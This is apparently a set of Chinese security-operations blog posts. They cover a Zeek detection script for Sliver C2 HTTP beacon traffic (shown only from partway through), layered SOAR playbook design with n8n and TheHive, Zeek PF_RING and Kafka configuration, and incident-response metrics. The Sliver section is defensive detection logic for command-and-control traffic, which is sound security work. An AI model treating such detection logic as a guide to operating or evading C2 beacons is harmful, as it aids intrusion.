for (value in result["sliver_http_beacon_traffic_event"]$unique_vals) {
if (! is_suspicious_query("GET", value$str)) return;
add suspicious_uri[value$str];
}

# Issue a notice if suspicious behavior is observed
NOTICE([
$note=Sliver_HTTP_Beacon_Traffic,
$uid=key_str_vector[0],
$src=to_addr(key_str_vector[1]),
$host=key_str_vector[2],
$p=to_port(key_str_vector[3]),
$cookie=key_str_vector[4],
$uris=suspicious_uri,
$msg=fmt("[+] Sliver HTTP beacon traffic detected, %s -> %s:%s", key_str_vector[1], key_str_vector[2], key_str_vector[3]),
$sub=cat("Sliver HTTP beacon traffic")
]);
}
}
]);
}

“看疗效”

iShot_2023-11-08_20.33.42

写在最后

感觉以后自己越来越少机会写这些了。。。但我还是想说:开源是“理念”,分享是“精神”。请让专业的人做专业的事!

你要是闲着没事干 就去把村口的粪挑了

写在最前面

​ 开源是“理念”,分享是“精神”。拒绝一切“对号入座”!

你要是闲着没事干 就去把村口的粪挑了

背景

​ 之前有写过一篇Blog(致我心中的“散装”SOAR,当Thehive遇到n8n),主要是介绍如何通过Thehive + n8n形成最“简(基)陋(础)”的SOAR。本篇Blog灵感主要是来源自己平时的思考与总结。那么,让我带领你深入浅出地探索编排的“艺术”,并展示如何“优雅”的设计一个剧本。说实话,当我说出这些“骚”话的时候,我竟一点都不觉得害臊。。。

img

优雅的设计一个剧本

  1. 设置一个Layer1 Workflow,作为告警的入口。同时指定一个Layer2 Workflow,作为结果的输出。这个Workflow中我的Kafka Topic是根据设备类型进行区分的,目的是便于后期进行扩展与维护。

    image-20230618231406229

    • Q:为什么选择按照设备类型进行接入?

      A:主要是出于性能方面的考虑。试想如果你日常的告警数据量比较大,很可能会频繁“拉起”这个Workflow,其实并不是每个告警都“值得”你去跑Workflow。当然你的告警数据量不大的话,可以不用区分。在这里,我选择了按照设备类型来区分,这也方便我后续按照设备类型的不同做一些微调。

    • Q: 为什么不直接扩展Layer1 Workflow?

      A:主要还是考虑到可扩展性。我个人理解的“编排”就和你写代码的思维方式差不多,你得让你的Workflow足够的健壮以及剧本一定的伸缩性。应尽量避免因为某个需求,而导致你需要对现有Workflow进行“手术”。相信我,你会很痛苦的!正因如此,我没有选择直接在Layer1进行扩展。避免出现“屎山”代码,剧本也一样如此。

    • Q:为什么图中Threat Intelligence用的是Webhook,而Threat Hunting是Workflow?

      A:至于原因嘛,主要是n8n不支持在同一个Workflow中并行运行Node,且也并不是所有Node都支持异步。好在HTTP Node是支持异步的,所以,当有异步需求或者并行处理需求的时候,我们可以使用Webhook这种方式调用Workflow。算是“曲线救国”吧,不知道未来版本会不会支持。当时在社区也专门开贴讨论过,更多请戳:Does n8n Workflow support parallel execution?


  2. 设置一个Layer2 Workflow,它用于承载Layer1的“需求”。

    image-20230612003234529

    • Q:为什么你会选择创建Threat Intelligence、Threat Hunting做为Layer2的Workflow?

      A:其实这里还是考虑到可扩展性的关系,Layer2 Workflow它即要承接Layer1 Workflow的“需求”,同时也要为Layer3 Workflow提供“支撑”。所以,Layer2本身就必须有很强的扩展性,我建议你可以把它想象成编程中的“Class”。

    • Q:编写Workflow有什么参考规范吗?

      A:编写Workflow并没有固定的规范,其设计完全依赖于作者的逻辑。但是,当我们将其用于事件响应(Incident Response, IR)时,我认为可以参考NIST发布的《计算机安全事件处理指南 (SP 800-61)》作为框架。这将帮助我们将当前的Workflow映射到IR的各个阶段,使我们在设计Workflow时更明确其“主要职责”。如果可以每个阶段都可以设计Workflow,以便更有效地应对特定的安全事件,当然这太过于理想化。以下是各阶段的详细介绍:

      • 准备阶段(Preparation):这个阶段包括配置和维护所有必要的安全工具和系统,以便能够有效地检测和应对安全事件。这包括设置和配置SOAR工具,以便它们能够与其他安全系统(如防火墙,入侵检测系统等)集成,并且能够接收并处理威胁情报。
      • 检测与分析阶段(Detection & Analysis):这是威胁情报和威胁狩猎最活跃的阶段。威胁情报可以帮助你识别和了解新的或已知的威胁,而威胁狩猎则是一个主动寻找未被发现的威胁的过程。
      • 遏制阶段(Containment):一旦检测到威胁,即应用预设的自动化流程去遏制威胁,例如隔离受影响的系统或阻止恶意的网络流量。
      • 消除阶段(Eradication):在这个阶段,会移除系统中的威胁组件,修复漏洞并应用补丁。
      • 恢复阶段(Recovery):这个阶段的目标是恢复被攻击的系统和服务,确保一切回到正常状态。
      • 经验总结阶段(Lessons Learned):在应急响应结束后,应对整个事件进行回顾,总结经验教训,提升未来的应急响应效率。

  3. 我通常将剧本会分为3层(Layer1 ~ Layer3),通常Layer3这一层的都是底层“打工仔”,就跟此刻的你一样。

    image-20230620145914433

    • Q:设计Layer3的Workflow时,要足够灵活且尽可能的“独立”。

      A:灵活是指,Layer3即支持被Layer2调用,也要支持通过从HTTP API的方式进行调用,便于后期与自动化进行整合。例如,通过TheHive的Cortex调用Layer3的Workflow,它不香?独立是指:在设计Layer3的时候,需要考虑与Layer2的“亲(耦)密(合)度”,尽可能的模块化,便于其他场景的Workflow单独引用与封装。

    image-20230620171551885

    • Q:Layer3是最后一层吗?之后会有Layer4、Layer5吗?

      A:这完全取决于Layer3的“规模”,如果你的Layer3比较复杂,为了更加精细化管理Layer3。可以考虑新增Layer4,此时Layer3将从“底层打工人”升级成了“头号打工仔”,升职加薪,指日可待!

    image-20230621000301500

总结

  • 我认为一个“优雅”的IR Playbook框架,至少需要3层。为什么?其实,你尝试以编程的逻辑去理解它就很容易了。Layer1就是功能“入口”,Layer2则是Class,而Layer3就应该是Function。

    image-20230620174335657

  • 一个优秀的Playbook,像极你的老板对你的要求:“既要、又要、还要

    • 既要:具有高效的自动化流程,优化安全团队的响应时间
    • 又要:有灵活的设计,以便适应各种安全事件的特性
    • 还要:易于维护和更新,以便随着威胁场景的变化和组织需求的变化进行调整

img

背景

​ 早在2019年AWS刚对外发布“Traffic Mirroring” 测试的时候,作为国内最早一批吃“螃蟹”的用户,期间各种试错、填坑之后,“怒”写下了“我在’云’上的日子 - AWS上流量镜像遇到的坑”。也幸好是前期积累的经验,在之后其他云平台上使用云原生的“Traffic Mirroring”对接NTA时更加“丝滑”,毕竟做安全的哪有不监控流量的?!

​ 本篇文章介绍的情况恰巧相反。假设,你目前所在的云平台暂不支持“Traffic Mirroring”你会怎么做?当然,我们可以通过安装agent的形式将流量发出来,这也是在云原生支持“Traffic Mirroring”之前的通用做法。如今这类的agent不少,开源的有,商业的也有。恰巧我现在就在使用某商业产品,不过很“蠢”的是该产品通过VXLAN发送数据的时候源端口竟然是固定的。正因为这个问题,引出了这篇文章。

​ 当你使用tcpdump的时候,你会看到这样的情况。其中,192.168.199.100是数据源,192.168.199.200 是NTA。

1
2
3
4
5
6
$ sudo tcpdump -nni eth1 -c 100 | grep 4789

23:52:25.748497 IP 192.168.199.100.49152 > 192.168.199.200.4789: VXLAN, flags [I] (0x08), vni 1
23:52:25.748498 IP 192.168.199.100.49152 > 192.168.199.200.4789: VXLAN, flags [I] (0x08), vni 1
23:52:25.748505 IP 192.168.199.100.49152 > 192.168.199.200.4789: VXLAN, flags [I] (0x08), vni 1
23:52:25.748530 IP 192.168.199.100.49152 > 192.168.199.200.4789: VXLAN, flags [I] (0x08), vni 1

​ 大家都知道,Zeek配合PF_RING之后是支持基于多进程的流量负载均衡的。PF_RING默认的负载均衡是基于5-tuple来进行的。也就是基于5元组进行的HASH,同一个HASH分配到同一个进程。由于我的数据流五元组是一样的,导致我开了16个进程的Zeek只有1个进程是满负载,其他的15个进程是“空转”的。也导致了流量一大就出现了丢包的问题。

解决方案

​ 不得不说一句Zeek的开源社区非常的活跃,在Slack上提问了相关问题后,大佬们就给出了“解题思路”。解决方案也很简单将 test_cluster_types设置为inner-5-tuple

​ inter 含义 引用原文:This PR adds support for the more recent “INNER” clustering strategies of PF_RING. These allow load balancing according to the IP addresses and ports inside (for instance) GRE tunnels, rather than according to the tunnel’s IP. This was leading to huge balancing issues on some sensors we run.

这里需要关注一下几个点:

  • PF_RING 8.2 版本集成了该功能,所以对PF_RING版本有要求

  • zeekctl版本有要求,ZeekControl version 2.5.0-5包含了此代码

    image-20230411112133033

修改后的Zeek配置文件代码

1
2
3
4
$ more /usr/local/zeek/etc/zeekctl.cfg

PFRINGClusterID = 99
PFRINGClusterType = inner-5-tuple

修改前

image-20230407232532950

修改后

image-20230411112934287

参考

写在最前面

​ 2022这一年有太多琐碎的事,导致这个“作业”从2022年“成功”被我拖到了2023年。如果你和我一样,尝试用开源组件来构建一套安全运营平台,并且恰巧你也正在使用Thehive来管理日常安全运营工作,同时在寻求提升运营效率的途径。那么,我觉得这篇文章应该会对你有所帮助。

现状

​ 由于一些历史原因,当前SIEM不仅负责多数据源的关联分析,也同时兼顾对日常告警的自动化响应。在初期团队资源有限的情况下可以用这种方式去“顶一顶”,到了后期如果你不去对功能做解耦,你的SIEM可能会变的越来越“笨重”。是的,SIEM并不擅长做自动化响应类的工作。随着时间的推移,你会发现它越来越难“胜任”这份工作。例如:

  • 自动化响应能力单一,无法实现复杂事件的自动化响应

    随着,安全事件的复杂程度不断的上升,我们在很大一部分的安全事件中是无法直接“断言”并采用简单粗暴的方式进行响应。更多情况下我们需要进行一系列的研判分析后,再决定启用对应的遏制动作。

  • 响应流程通过代码实现,维护成本较高不利于后期管理

    由于前期是通过脚本开发的自动化响应功能,未采用Workflow(工作流)的直观展现方式。在后期不利于团队多人协作,并且对于一个新入职的小伙伴而言短期内很难维护。

  • SIEM平台上分析与响应耦合度太高,导致很难对SIEM功能进行扩展

    所以,我们需要SOAR(安全编排与自动化响应)来帮助我们承接安全事件中响应侧的需求,从功能上进行“解耦”。


​ 自SOAR这个概念在2017年被提出后,经过5年的迭代无论国内还是国外都已经有了相对成熟的商业产品了。商业产品的我就不过多介绍了,开源的项目介绍几个比较火的:

  • Shuffle
  • n8n 本次推荐
  • Node-Red
  • W5 国内大佬(三斤)开源的SOAR项目,必须支持!

开始搬砖🚧

​ 这里我使用了n8n与Thehive进行集成,这也是Thehive官方推荐的方案之一。我尝试把SIEM上的响应逻辑迁移到了n8n上,并且也顺带重新设计了响应剧本的Workflow。一个典型的SOAR剧本应聚焦在 分析遏制 2个阶段上,因为只有让分析研判尽可能的全面才能更好的去支撑下一阶段的遏制。下面和大家分享一下使用了n8n作为SOAR之后的一些理解吧,欢迎大家交流!

img

1. 剧本自身要分类

​ 我们在设计剧本的时候也应当为剧本自身做好分类,这是为了便于后期更好的在其他剧本中复用这些节点。一个主剧本必然是通过不同的子剧本“组装”而来。我觉得这和写代码很像,要先把“类”抽象好,然后在下面不断的去完善“功能”。切记,不要一上来就想整一个“复杂”的剧本,尽可能的把它拆细了拆小了。

image-20230102125302449

​ 以下是我在n8n上编排的威胁情报剧本,它可以是任何一个复杂剧本的分支,支持将内容输出到TheHive,并将告警推送到Slack上。

n8n
  • 主剧本

    这里是一个Suricata alert的主剧本,将会由不同的分支子剧本共同“支撑”

image-20230116181004565

  • 子剧本

    它可以是任何一个”大”剧本的分支,例如这是一个威胁情报的子剧本

image-20230116181218577

image-20230116181542704

Slack

​ 当命中威胁情报后调用Slack发送告警并升级当前Case等级

image-20230113233954354

TheHive
  • 所有的分析记录与事件详情通过Thehive来汇总与呈现

image-20230113233840580

  • 为每个响应阶段创建对应的Task

image-20230113235655162

  • 执行结果更新到Task的logs

image-20230114003914196

  • 将威胁情报Tags更新到observables,便于分析人员直观的了解当前IoC的信息

image-20230113234147771

2. 内容呈现很关键

​ 对于调查取证的剧本而言,查询结果呈现非常的关键。如果SOAR运行之后无法直观的展现数据,想看详细数据还得让你去下载一个文本,这对分析人员而言并不是很友好且割裂感很强。这里我就要推荐一下Thehive了,如果你的安全事件都是推送到了Thehive上,你完全可以将输出的内容设置为Markdown格式,TheHive能够帮助你更好的呈现自动化节点输出的结果。就像下面这个示例,为了帮助分析人员缩短研判时间,现需要对威胁情报的剧本进行扩展。我们会对IP类型IoC进行PDNS的反查,将反查的域名再次与威胁情报进行匹配,并通过Shodan收集攻击者的主机信息。在这种情况下,对于数据的呈现就提出了要求。一个好的展现方式可以让分析人员更快的了解信息,反之将适得其反。

TheHive
  • 虽然查询的数据源比较多,不过通过TheHive的Markdown格式起来还算比较直观

image-20230114002858890

3. 你的下一个剧本不应该只是“响应”

​ 我们要知道当一个安全事件触发时,我们为安全事件所做的任何动作都是在”响应”这个事件。SOAR中R(Response)所指的响应,也并不只是在最后遏制的时候才叫做响应。不论哪种类型的剧本,它的目的都是为了提升安全事件的处置效率。这里建议大家千万不要觉得SOAR上的Playbook(剧本)必须都是要标配有遏制的动作。为什么这么说?是因为在一些企业中有SOP(安全事件指导手册),SOP中都会标注遏制方法或者响应措施,导致有些小伙伴认为SOAR上的剧本需要按照SOP做1:1的还原。

​ 另外一方面在实际运营中,对于一个安全事件想要完全自动化走完剧本还是挺“艰难”的,能够被自动化走完的更多是“专项”场景,这类安全事件针对性强处理流程和模式相对固化。所以,我们在实际工作中,遇见此类告警的机率相对于还是比较少的。对此,我们应尽可能的完善分析类型的剧本,将可被“固化”的分析逻辑集成到剧本中,利用自动化提升分析的效率,也可以帮助我们规避因为分析师经验问题导致的分析“面”缺失。例如,我们可以提取Payload中需要被执行回连的IP或者Domain,并在当前网络中检索是否有对应的请求数据,从而研判这个攻击是否成功。就像之前描述的那样,这并不是一个遏制类的剧本,它是一个分析研判类的剧本,但它确实起到了效果。

n8n
  • Hunting Callback IoC

image-20230116191844389

  • 子剧本

image-20230116184527491

TheHive
  • 一旦检测到内部流量存在Callback IoC的数据则升级告警等级,反之则认为攻击并未成功,告警降级自动关闭Case。

image-20230114001859333

image-20230114002038716

  • 尽可能利用TheHive的task logs,输出有价值的信息。也许它并不能帮助你实现自动关闭Case,但是它可以帮助分析师更快的查阅已被自动化执行的结果

image-20230114002332982

4. 对入SOAR的告警提出要求

​ 如果我们想要用好SOAR,就应当对入SOAR的告警提出要求。首先我们得确保入库告警的质量,如果你的告警本身置信度就不高,我相信SOAR在这并不能帮助你什么。SOAR本身就是辅助安全运营,所以本质对安全能力的成熟度也是有要求的。例如:

  • 企业自身平台的自动化程度,很多时候SOAR都必须通过API调用的方式查询。例如:CMDB资产平台,很多时候我们是需要调用CMDB资产平台查询主机的业务信息、端口开放情况、安全组等。
  • 本身人员的代码能力,就n8n而言,一些扩展事项还是需要通过代码实现的,至少Python、JS得会写。
  • 企业自身安全能力的成熟度,如果连基础的安全能力都不具备也没有专职的安全分析人员,我建议暂且可放一放。搞搞基础建设,它不香吗?!安全运营,本身就是一个 P(无)D(限)C(循)A(环)的过程。

写在最后

​ 对于SOAR我是这么理解的,不要“一味”的追求大(D)而(炸)全(天)的剧本,就像SIEM厂家“鼓吹”的我们有N个牛P的检测场景一样,工作中你能遇到的又有多少?对于SOAR的剧本,能够被复用就好,能够提升效率就好。不要“迷信”每个剧本都必须有“遏制”的动作,有的时候“分析研判”的剧本真的很“香”。如果你一定会去做些什么,为什么不让它自动化并且找个“好看”的地方“放”(展现)起来。

​ 好了,就啰嗦到这吧。后面如果还有空的话会再补充,欢迎大家交流,写的不对的地方也欢迎指正。在新的一年想创建一个SOAR Playbook的社区,有没有志同道合的小伙伴一起?欢迎扫码加好友,可以一起聊一聊。

image-20230114004935522

另外我觉得你也许还会感兴趣的文章:

写在前面

​ 上半年是忙的要死,下半年都没怎么做“阳间”的事。这会“阳”了,顺带可以整理一些零散的知识点分享给大家。这一偏会比较剪短一些。

背景

​ 知道Zeek的小伙伴应该都熟悉或者知道Suricata吧。Suricata在每次调整规则之后是可以通过reload来直接加载规则的,这样的好处是不用重启Suricata就让规则生效,生效速度很快。不知道大家在Zeek上是怎么做的,我之前都是用zeek deploy的方式确保最新的配置加载。起初,这并不会有什么太大的问题,但是随着Zeek的机器越来越多,操作就会变的异常繁琐。当然,如果你使用了Zeek的集群架构,它也是比较方便的。我今天就来介绍一个让配置加载变的更加便捷的方法,那就是利用Zeek自带的Configuration Framework来实现日常大部分的配置变更与“热”加载。

那么开始吧?

注意支持类型

​ 就像我上面的描述那样,Configuration Framework能做到对日常大部分的配置实现“热”加载。因为它有类型的要求,只有在脚本中包含指定的配置项类型才能实现试试下发与“热”加载。一旦出现类型错误,日志将会被发送至reporter.log文件中,大家注意观察。目前支持的类型在大多数情况下是够用的,下表为详细类型:

Data Type Sample Config File Entry Comments
addr 1.2.3.4 Plain IPv4 or IPv6 address, as in Zeek. No /32 or similar netmasks.
bool T T or 1 for true, F or 0 for false
count 42 Plain, nonnegative integer.
double -42.5 Plain double number.
enum Enum::FOO_A Plain enum string.
int -1 Plain integer.
interval 3600.0 Always in epoch seconds, with optional fraction of seconds. Never includes a time unit.
pattern `/(foo bar)/`
port 42/tcp Port number with protocol, as in Zeek. When the protocol part is missing, Zeek interprets it as /unknown.
set 80/tcp,53/udp The set members, formatted as per their own type, separated by commas. For an empty set, use an empty string: just follow the option name with whitespace.Sets with multiple index types (e.g. set[addr,string]) are currently not supported in config files.
string Don’t bite, Zeek Plain string, no quotation marks. Given quotation marks become part of the string. Everything after the whitespace separator delineating the option name becomes the string. Saces and special characters are fine. Backslash characters (e.g. \n) have no special meaning.
subnet 1.2.3.4/16 Plain subnet, as in Zeek.
time 1608164505.5 Always in epoch seconds, with optional fraction of seconds. Never includes a time unit.
vector 1,2,3,4 The set members, formatted as per their own type, separated by commas. For an empty vector, use an empty string: just follow the option name with whitespace.
示例:record-http_domain

​ 针对需要对HTTP做审计或者监测的小伙伴,可以通过此方法快速的将不需要的记录的域名进行过滤,或者只记录关注的域名。

  • record-http_domain.zeek

    任何需要进行动态调整的参数,都必须在export中通过option去声明。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    module HTTP;
    module HTTPFilterDomain;

    export {
    # domain name
    option local_domain: set[string] = {};
    # record_local_zone
    option record_local_zone: bool = F;
    # Load HTTP config.dat
    redef Config::config_files += { "/usr/local/zeek/share/zeek/site/http-audit/record-http_domain.dat" };
    }

    redef record HTTP::Info += {
    is_local_zone: bool &log &default=F;
    };

    hook HTTP::log_policy(rec: HTTP::Info, id: Log::ID, filter: Log::Filter) &priority = 10
    {
    if ( filter$name != "default" )
    return;

    if ( record_local_zone )
    {
    if ( rec$host ! in local_domain )
    break;
    rec$is_local_zone = T;
    }
    else
    {
    if ( rec$host in local_domain )
    break;
    }
    }
  • record-http_domain.dat

    1
    2
    3
    4
    # string
    HTTPFilterDomain::local_domain ifconfig.io,ipinfo.io
    # bool
    HTTPFilterDomain::record_local_zone F

看一下效果如何

​ 由于我是将HTTP发送到了Kafka里面,好处就是不用关注本身NTA机器的磁盘存储的问题了。这里我通过Kafka的Topic数据给大家看下。

iShot_2022-12-16_16.24.59

写在前面

​ 哎,今年上半年实在太忙了,工作中一些琐碎的事让我日常处于和技术“脱线”的状态。好不容易挤出一点时间来整理一下手头的东西,想着还有哪些可以拿出来给大家分享。

背景

​ 由于流量镜像后的网络流量太大,若想利用Zeek将数据解析后进行分析,硬盘的空间以及I/O是我们必须考虑的。虽然我们可以写个脚本做定时任务清除,但这并不是最优解决方案。至少在我的场景中这些数据都是需要发送到Kafka上的,如果能做到在数据源阶段就不用落地在本地磁盘岂不美哉?所以,我需要对数据采集后的写入方式进一步优化。

  • 优化前

    Zeek将日志留存在本地硬盘,由本地安装的filebeat发送给Kafka,最终落地到SIEM上。

    image-20220705172727370


  • 优化后

    Zeek日志将不会留存在本地硬盘上,由Zeek Kafka插件将日志发送到Kafka集群,省去了数据落盘的步骤。

    image-20220705173013941

安排

​ 之前就有了解过Zeek可以通过插件的形式将日志发送到Kafka上,由于当时没有需求也就没有继续探究,想着这次需求来了就开启了“折腾”模式。本次我使用的是Zeek-Kafka这个插件,很多网上的文章介绍的插件是 metron-bro-plugin-kafka。大家可以认为这个是Zeek-Kafka的前身,后者(metron-bro-plugin-kafka)已经并没有在更新了。使用的话还是推荐Zeek-Kafka

安装

​ 安装流程比较简单,参考文档Zeek-Kafka即可。至此文章结束。下期再会!


知识点

​ OK,在开始之前我们来聊一下使用了这个插件之后我认为需要调整的地方以及一些Zeek知识点的补充。

重新认识Zeek日志框架

​ 为什么这么说?上面有说到,我做此事的目的是为了节省硬盘空间、降低I/O的压力。实际在我使用此插件时,它会把日志发送到Kafka集群并同时保留原始的日志数据在本地硬盘(擦,忙活半天,搞了个寂寞!)。不过,至少确认日志发送到Kafka是OK的,现在我们只需要有选择性的drop掉写入硬盘的操作即可。为了满足这个需求,就需要我们先了解一下Zeek - Logging Framework(日志框架)。由于我之前写过一些Zeek的检测场景,对于这个框架并不陌生,只不过理解上不够深入,经过这一次,算是比之前有了更加深入的理解。

Zeek 的日志接口是围绕三个对象构建的:

image-20220716232345238

  • Streams(流)

    ​ 一个日志流对应于一个单一的日志。它定义了一个日志所包含的字段的集合,以及它们的名称和类型。例如,conn流用于记录连接摘要,http流用于记录HTTP活动。

  • Filters(过滤器)

    ​ 每个流都有一组过滤器,决定哪些信息被写出来,以及如何写出来。默认情况下,每个流都有一个默认的过滤器,直接把所有的东西都记录到磁盘上。然而,可以添加额外的过滤器,只记录日志记录的一个子集,写到不同的输出,或者设置一个自定义的旋转间隔。如果从一个流中删除所有的过滤器,那么该流的输出就会被禁用。

  • Writers(写入器)

    ​ 每个过滤器都有一个写入器。写入器定义了被记录信息的实际输出格式。默认的是ASCII写入器,它产生以制表符分隔的ASCII文件。其他写入器是可用的,比如二进制输出或直接记录到数据库。

简单总结Streams与Filters关系是一对多,Filters与Writers关系是一对一。

我们可以用以下几种方式来定制Zeek的日志:

  1. 创建一个新的日志流

  2. 用新的字段来扩展现有的日志

  3. 对现有的日志流应用过滤器

  4. 通过设置日志写入器选项来定制输出格式


根据我们的需求,这里选择方案3对现有的日志流应用过滤器)。你会用到的方法如下:

以下任意一种方式都可以满足我们的需求,既原始日志不会落地在硬盘且直接写入Kafka集群。

示例代码1:删除默认过滤器

1
2
3
4
5
6
7
8
9
10
11
12
13
event zeek_init() &priority=-10
{
# 1. 删除默认过滤器
Log::remove_filter(HTTP::LOG, "default");
# 2. 创建新的过滤器
local http_filter: Log::Filter = [
$name = "kafka-http",
$writer = Log::WRITER_KAFKAWRITER,
$path = "http"
];
# 3. 绑定流与过滤器
Log::add_filter(HTTP::LOG, http_filter);
}

示例代码2 - 修改默认过滤器

1
2
3
4
5
6
7
8
9
event zeek_init() &priority=-10
{
# 1. 获取默认过滤器
local f = Log::get_filter(HTTP::LOG, "default");
# 2. 修改默认写入器
f$writer = Log::WRITER_KAFKAWRITER;
# 3. 绑定流与过滤器
Log::add_filter(HTTP::LOG, f);
}

真实场景

  1. 场景1:适配HTTP的文件还原(file-extraction-plus)场景

    • kafka/kafka-config.zeek

      ​ 定义Kafka集群的配置

    1
    2
    3
    4
    5
    redef Kafka::kafka_conf = table(
    ["metadata.broker.list"] = "node-1:9092,node-2:9092,node-3:9092"
    );

    redef Kafka::json_timestamps = JSON::TS_ISO8601;
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    module Enrichment;

    redef record HTTP::Info += {
    extract: bool &default=F &log;
    domain: string &optional &log;
    };

    hook HTTP::log_policy(rec: HTTP::Info, id: Log::ID, filter: Log::Filter)
    {
    if ( filter$name != "http_extraction" )
    return;

    if ( rec$extract == F )
    break;
    }

    event zeek_init()
    {
    local filter: Log::Filter = [$name="http_extraction", $path="http-extraction"];
    Log::add_filter(HTTP::LOG, filter);
    }

    export {
    global http: function(f: fa_file): fa_file;
    }

    function http(f: fa_file): fa_file
    {
    f$http$extract = T;
    f$http$domain = f$http$host;
    return f;
    }
    • kafka/http_extraction-to-kafka.zeek

      ​ 利用Log::get_filter方法获取过滤器(http_extraction),通过将写入器修改为WRITER_KAFKAWRITER。最终实现将命中文件还原的HTTP事件通过指定topic(zeek-http_extraction)发送到Kafka。

    1
    2
    3
    4
    5
    6
    7
    8
    event zeek_init() &priority=-10
    {
    # handles HTTP
    local f = Log::get_filter(HTTP::LOG, "http_extraction");
    f$writer = Log::WRITER_KAFKAWRITER;
    f$config = table(["topic_name"] = "zeek-http_extraction");
    Log::add_filter(HTTP::LOG, f);
    }
  2. 场景2:算是场景1进行扩展,在保留HTTP文件还原的日志前提下,将全量的HTTP数据发送到指定的topic(zeek-http)。

    • kafka/kafka-config.zeek
    1
    2
    3
    redef Kafka::kafka_conf = table(
    ["metadata.broker.list"] = "node-1:9092,node-2:9092,node-3:9092"
    );
    • kafka/http-to-kafka.zeek
    1
    2
    3
    4
    5
    6
    7
    8
    event zeek_init() &priority=-10
    {
    # handles HTTP
    local f = Log::get_filter(HTTP::LOG, "default");
    f$writer = Log::WRITER_KAFKAWRITER;
    f$config = table(["topic_name"] = "zeek-http");
    Log::add_filter(HTTP::LOG, f);
    }

对比

​ 这里用PCAP包回放的形式给大家验证一下前后的对比,为了便于验证,我这里只针对HTTP数据送入到了Kafka。

  • 修改前

    • 回放http.pcap,本地会留存 http.log
    • 回放http_extraction.pcap,本地会留存http-extraction.log

    image-20220716232345238

  • 修改后

    • 回放http.pcap,本地无http.log。topic: zeek-http,存在日志
    • 回放http_extraction.pcap,本地无http-extraction.log。topic: zeek-http_extraction,存在日志

    image-20220716232345238

最后

​ 下一篇 《Zeek-Kafka 之 机器受不了!》将会向大家介绍,若想在实际环境中完全发挥Zeek-Kafka插件的能力,我们的架构也需要进行一些调整,一起探索Zeek集群的模式吧。

_images/deployment.png

背景

​ 回首2021年工作,主要重心是放在了安全运营上。既然负责安全运营自然也逃不开应急响应这一茬。在这个用数字“说话”的时代,那必须是要把应急响应KPI给整的明明白白的。领导们爱看,同行们也可以用来参考。

​ 首先需要明确的一点是,我个人是不排斥数字“说话”的,前提是大家对于应急响应KPI的理解必须一致。为什么这样说?主要是避免后期在复盘的时候在KPI的时间上进行过多的“Battle”。同时也是希望大家可以真正理解这些KPI的含义,更好的去制定这些KPI。

​ 今天这一篇文章主要就是介绍应急响应中的KPI。不过在讨论之前,还是得简单的介绍一下什么是应急响应。

应急响应

什么是应急响应?

​ “应急响应”对应的英文是“Incident Response”(IR),是一种处理安全事件、漏洞和网络威胁的结构化方法。通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施

应急响应流程

​ 应急响应流程可以参考NIST发布的《计算机安全事件处理指南 (SP 800-61)》其中明确了应急响应4个阶段并细分出了6个步骤。

img

  • 准备阶段:人员、预案手册(Playbook)、工具;
  • 检测与分析阶段:确认安全事件类型,明确事件等级;
  • 遏制、根除和恢复阶段:立即止损,根据安全事件类型选择对应的遏制方法并制定恢复计划;
  • 事后总结:从本次的安全事件中改进流程,并将新数据反馈到应急响应流程的准备阶段。你应该询问、调查并记录以下问题的答案:
    • 发生了什么,在什么时候?
    • 事件响应小组对事件的处理情况如何?是否遵循了流程,是否足够?
    • 更早地发现还需要哪些信息?
    • 是否采取了任何导致损坏或阻碍恢复的错误操作?
    • 如果下次发生同样的事件,我们可以采取哪些不同的做法?
    • 我们能否与其他组织或其他部门更好地分享信息?
    • 我们是否学会了防止类似事件再次发生的方法?
    • 我们是否发现了类似事件的新预兆或迹象,以供将来观察?
    • 需要哪些额外的工具或资源来帮助预防或减轻类似事件?

应急响应指标

MTTD

  • 什么是MTTD?

    MTTD:平均检测时间(Mean time to detect )。MTTD是指从系统故障到检测或告警所需的平均时间。

  • 如何计算MTTD?

    MTTD = 故障与检测之间的总时间/事件数量

    例如:某系统在12:00发生故障,但直到12:10才有人注意到或被提醒,那么此时MTTD是10分钟。

MTTA

  • 什么是MTTA?

    MTTA:平均确认时间(Mean time to acknowledge)。MTTA是指从系统产生告警到人员开始注意并处理的平均时间。

  • 如何计算MTTA?

    MTTA = 检测与确认之间的总时间/事件数量

    例如:安全组件在12:10检测并发送告警后,应急响应人员在12:15开始处理该事件。那么此时MTTA是5分钟。

MTTI

  • 什么是MTTI?

    MTTI:平均调查时间(Mean time to investigate)。MTTI是指从确认一个安全事件到开始调查其原因和解决方案的平均时间。

  • 如何计算MTTI?

    MTTI = 确认告警与分析调查之间的总时间/事件数量

    例如:某安全运营人员在12:15开始处理告警并在12:30完成初步分析及拟定止损方案。那么此时MTTI是15分钟。

MTTC

  • 什么是MTTC?

    MTTC:平均遏制时间(Mean Time to contain)。MTTC是指安全团队找到威胁者并阻止他们进一步进入你的系统和网络所需的时间。

  • 如何计算MTTC?

    MTTC = 分析调查与快速止损之间的总时间/事件数量

    例如:自安全事件在12:10被检测到后,应急响应人员在12:45成功遏制了攻击者的利用方式并阻断了通讯隧道,有效地防止攻击者进行下一步入侵。

    注意:遏制可能是隔离一个电子邮件账户,重设一个用户密码,或关闭一个服务器。遏制是走向恢复的第一步。应急响应团队越快遏制住威胁行为者,越能降低企业受到更大风险的可能性。

MTTR

MTTR有4种不同的测量方法,这是由于R可以代表修复(repair)、恢复(recovery/restore)、响应(respond)和解决(resolve)。虽然这4个指标有重叠,但它们都有各自的含义和细微差别。安全人员通常关注的是平均响应时间这个指标。

  • 平均修复时间(Mean time to repair)

    • 什么是MTTR(平均修复时间)?

      MTTR是修复一个系统的平均时间。它包括维修时间和测试时间,直到系统再次完全运作。

    • 如何计算MTTR(平均修复时间)?

      MTTR = 将修复时间与恢复时间相加/修复次数

      例如:一周内有10次停电,修复系统花费了4个小时。四个小时是240分钟。240除以10是24。这意味着在这种情况下,修复的平均时间是24分钟。

      注意:平均修复时间并不总是与系统中断本身的时间相同。在某些情况下,修复这个动作是在产品故障或系统中断后的几分钟内开始。

  • 平均恢复时间(Mean time to recovery/restore)

    • 什么是MTTR(平均恢复时间)?

